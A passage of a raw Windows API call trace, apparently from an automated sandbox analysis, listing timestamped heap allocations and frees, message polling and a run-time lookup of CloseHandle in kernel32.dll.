HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.949] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0094.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.951] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.951] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0094.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.952] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431daa0 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.954] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0094.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0094.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0094.954] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0094.955] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.956] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0094.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca1a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.956] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.956] CloseHandle (hObject=0x298) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.957] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.958] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, 